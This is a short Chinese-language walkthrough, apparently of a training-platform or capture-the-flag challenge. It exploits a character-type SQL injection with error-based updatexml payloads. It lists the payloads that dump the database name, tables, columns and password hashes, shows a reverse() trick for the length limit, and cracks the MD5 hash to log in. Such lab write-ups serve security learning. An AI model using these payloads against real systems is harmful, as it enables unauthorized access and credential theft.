发现当 id=1’ 时页面报错,猜测是字符型注入
    单引号.PNG 利用SQL语句查数据库
    id=1'and(select updatexml(1,concat(0x7e,(select database())),0x7e)) --+
    数据库.PNG
    利用SQL语句查数据库表
    id=1' and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='stormgroup')),0x7e)) --+
    table.PNG
    利用SQL语句爆列
    id=1' and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='member'),0x7e)) --+
    Column.PNG
    利用SQL语句爆字段值
    id=1'and(select updatexml(1,concat(0x7e,(select group_concat(password)from member where status=1)),0x7e)) --+
    status1.PNG
    因为 updataxml 长度限制为32位,使用 reverse 函数把字段值逆序输出
    id=1'and(select updatexml(1,concat(0x7e,reverse((select group_concat(password)from member where status=1))),0x7e)) --+
    status11.PNG
    利用python将逆序数据正向输出
    正向输出.PNG
    最后的字段值为:
    826ff187797d81521a5942f72bac83d7
    MD5解密得到:
    452993

    账户为mozhe,密码为452993登录得到key
    key.PNG